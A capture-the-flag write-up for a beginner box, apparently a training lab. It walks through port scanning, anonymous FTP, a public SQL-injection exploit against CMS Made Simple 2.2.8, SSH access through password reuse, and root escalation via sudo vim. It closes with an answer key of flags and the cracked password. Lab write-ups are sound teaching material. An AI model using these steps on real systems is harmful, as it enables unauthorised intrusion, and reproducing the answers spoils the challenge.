Writeup Aria
Tags: challenges, B2r, Easy

Simple CTF

Beginner-level CTF.

Solution

Enumeration

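# Service/version scan of nmap's default top-1000 ports; -oN keeps the raw
# output on disk so the port/version answers below can be checked later.
nmap -sV -T4 -oN nmap_initial.txt 10.49.147.244
# PORT     STATE SERVICE VERSION
# 21/tcp   open  ftp     vsftpd 3.0.3
# 80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
# 2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
# Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
#
# Two services below port 1000 (21, 80) and SSH on the non-standard 2222.
# NOTE(review): a full-range follow-up (`nmap -p- -T4 10.49.147.244`) is cheap
# insurance against services outside the default port list, and adding -sC
# would typically have reported the anonymous FTP login directly (ftp-anon).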

Check for FTP anonymous login

# vsftpd 3.0.3 on :21 — try the anonymous account (when enabled, the server
# typically accepts any password; an e-mail address is the convention).
ftp 10.49.147.244
# user: Anonymous

ls
# pub
cd pub
ls
# ForMitch.txt
# Pull the note down; the filename itself already hints at a username ("Mitch").
get ForMitch.txt
exit

# The note states the dev reused one weak password for the system user — this
# credential-reuse lead is what the rest of the box turns on.
cat ForMitch.txt
# Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Attempt to exploit SSH

# Version-based exploit lookup for the two remaining services. Only the OpenSSH
# results are recorded below. Note that none of them is remote code execution:
# they are username-enumeration and DoS entries plus two local/agent issues,
# so SSH here is a credential target, not an exploit target.
searchsploit Apache httpd 2.4.18
searchsploit OpenSSH 7.2p2
# ---------------------------------------------------------------------- ---------------------------------
#  Exploit Title                                                        |  Path
# ---------------------------------------------------------------------- ---------------------------------
# OpenSSH 2.3 < 7.7 - Username Enumeration                              | linux/remote/45233.py
# OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                        | linux/remote/45210.py
# OpenSSH 7.2 - Denial of Service                                       | linux/dos/40888.py
# OpenSSH 7.2p2 - Username Enumeration                                  | linux/remote/40136.py
# OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Doma | linux/local/40962.txt
# OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading              | linux/remote/40963.txt
# OpenSSH < 7.7 - User Enumeration (2)                                  | linux/remote/45939.py
# OpenSSHd 7.2p2 - Username Enumeration                                 | linux/remote/40113.txt
# ---------------------------------------------------------------------- ---------------------------------

We try the "OpenSSH 7.2p2 - Username Enumeration" exploit (40136.py):

# Locate the username-enumeration PoC (EDB 40136) and run it against :2222
# with a large username wordlist.
locate linux/remote/40136.py
# /opt/exploitdb/exploits/linux/remote/40136.py
# /opt/searchsploit/exploits/linux/remote/40136.py
python3 /opt/searchsploit/exploits/linux/remote/40136.py -h

python3 /opt/searchsploit/exploits/linux/remote/40136.py 10.49.147.244:2222 -U /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
# Failed with a missing-library error under python3, so this path was abandoned.
# It is not needed anyway: ForMitch.txt already points at the user, and the
# CMS step below confirms the username "mitch".

Inspect the HTTP service and enumerate directories with gobuster

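# Directory brute-force of the web root; -o keeps the results on disk.
gobuster dir -u http://10.49.147.244 -w /usr/share/wordlists/dirb/common.txt -o gobuster_root.txt
# robots.txt           (Status: 200) [Size: 929]
# simple               (Status: 301) [Size: 315]

# robots.txt returned 200 with 929 bytes but was never read in the original
# run — always inspect it; it is free information about paths the site owner
# wanted kept out of search engines.
curl -s http://10.49.147.244/robots.txt
# (output not recorded in this writeup)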


The /simple page reports: "This site is powered by CMS Made Simple version 2.2.8".

Exploit CMS Made Simple 2.2.8 (CVE-2019-9053, SQL injection)

# 2.2.8 is below the 2.2.10 fix, so it matches the "< 2.2.10 - SQL Injection"
# entry (CVE-2019-9053, see the answers below).
searchsploit CMS Made Simple 2.2.8
# CMS Made Simple < 2.2.10 - SQL Injection                              | php/webapps/46635.py

locate  php/webapps/46635.py
# /opt/exploitdb/exploits/php/webapps/46635.py
# /opt/searchsploit/exploits/php/webapps/46635.py

# The exploit script needs the termcolor module (hence the pip install).
pip install termcolor
python /opt/searchsploit/exploits/php/webapps/46635.py -h
#  -h, --help            show this help message and exit
#   -u URL, --url=URL     Base target uri (ex. http://10.10.10.100/cms)
#   -w WORDLIST, --wordlist=WORDLIST
                        # Wordlist for crack admin password
#   -c, --crack           Crack password with wordlist

# The SQLi pulls the admin username, e-mail, salt and password hash from the
# database (blind extraction — expect it to take a while), then -c cracks the
# hash offline against rockyou. If the wordlist crack fails, the salt+hash pair
# printed here can be handed to hashcat/john instead of re-running the injection.
python /opt/searchsploit/exploits/php/webapps/46635.py -u http://10.49.147.244/simple -w /usr/share/wordlists/rockyou.txt -c
# [+] Salt for password found: 1dac0d92e9fa6bb2
# [+] Username found: mitch
# [+] Email found: admin@admin.com
# [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
# [+] Password cracked: secret

Log in to the CMS

Go to http://10.49.147.244/simple/admin/login.php and log in with username mitch and password secret.

Go to the file manager and upload a PHP reverse shell, with a listener waiting on the attacking machine:

# Listener for the PHP reverse shell; the port must match the one baked into
# the uploaded file.
nc -lvnp 9001

However, the upload did not succeed when I tried it, so I skipped the CMS foothold. The same credentials work over SSH, which ForMitch.txt already hinted at (password reuse on the system user).

Access via SSH (credential reuse)

# The CMS password is reused for the system account, exactly as ForMitch.txt
# warned; SSH listens on the non-standard port 2222.
ssh -p 2222 mitch@10.49.147.244
# password: secret

ls
# user.txt
cat user.txt
# G00d j0b, keep up!

Privilege escalation

# A second user, sunbath, exists; its home is mode 750 (drwxr-x---), so mitch
# cannot read it.
ls -la /home/
# drwxr-x---  3 mitch   mitch   4096 aug 19  2019 mitch
# drwxr-x--- 16 sunbath sunbath 4096 aug 19  2019 sunbath

# Check sudo rights first — the cheapest privesc vector to rule in or out.
sudo -l
# User mitch may run the following commands on Machine:
    # (root) NOPASSWD: /usr/bin/vim

# vim can run shell commands with ':!', so root-owned vim is a root shell
# (standard GTFOBins technique); -c executes the command on startup.
sudo vim -c ':!/bin/sh'
whoami
# root
cat /root/root.txt
# W3ll d0n3. You made it!

Answers


  • How many services are running under port 1000?

2

  • What is running on the higher port?

ssh

  • What's the CVE you're using against the application?

CVE-2019-9053

  • To what kind of vulnerability is the application vulnerable?

SQL injection (SQLi)

  • What's the password?

secret

  • Where can you login with the details obtained?

ssh

  • What's the user flag?

G00d j0b, keep up!

  • Is there any other user in the home directory? What's its name?

sunbath

  • What can you leverage to spawn a privileged shell?

vim

  • What's the root flag?

W3ll d0n3. You made it!
